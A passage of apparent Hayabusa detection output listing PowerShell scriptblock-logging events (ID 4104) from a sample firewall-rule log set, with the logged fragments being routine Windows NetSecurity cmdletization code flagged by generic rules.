-is",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetA",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetA",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } 